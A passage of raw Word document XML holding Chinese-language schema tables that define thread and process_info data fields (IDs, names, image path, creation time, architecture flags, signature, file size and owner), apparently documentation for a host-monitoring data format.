            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D82CCE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>线程状态，0:初始化 1:就绪 2:运行 3:备用 4:终止 5:等待 6:转换 7:延迟就绪 其他值:未知状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42F3E87A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2523F59D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>start_address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F925D4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1247EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215E8A7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F8150C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222A6EF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>start_address_str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50EF704A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB3A512" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D06360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58EB4187" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0512F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mem_protect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B5C04A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279E8497" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0751670E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内存保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CECE7DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="543DAFC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mem_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8D8065" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18837C62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07477F57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内存类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="078849DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="489" w:name="_Toc115166317"/>
      <w:bookmarkStart w:id="490" w:name="processinfo数据结构"/>
      <w:bookmarkEnd w:id="488"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4387"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C5D0A5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28602FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A2D9919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02573139" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660802B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A639871" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78636122" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17923CE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603744F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435D3914" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="705C6916" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09DC21A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0323FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C88561C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755C48A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="515E7FF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24386E33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parent_process_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E86216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2507AB61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3246635C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="438E3CDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315FDB68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parent_process_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4570F2DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19219FBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F9E9E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="463F2029" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C21293" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>image_file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A4F69E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="439E3D86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AB1486" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程映像文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="207F5E0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC1A9AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66971116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C775E85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A71F2E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="375713E2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51482164" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>b_64bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5735DF28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BED59A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C154724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>64进程标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A137A20" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A29CD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>b_wow64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5367D8D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F6B028" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD0D8A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32位进程在64位系统标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72968268" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2840C4D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57CB3953" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A631639" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36583FDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="795380CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1315C56C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45437A9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48C352E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="084FD2B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="700CFF7C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1381663C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663BC7F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E73231A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42166427" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29C14FF1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB237A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790DC207" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD987DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
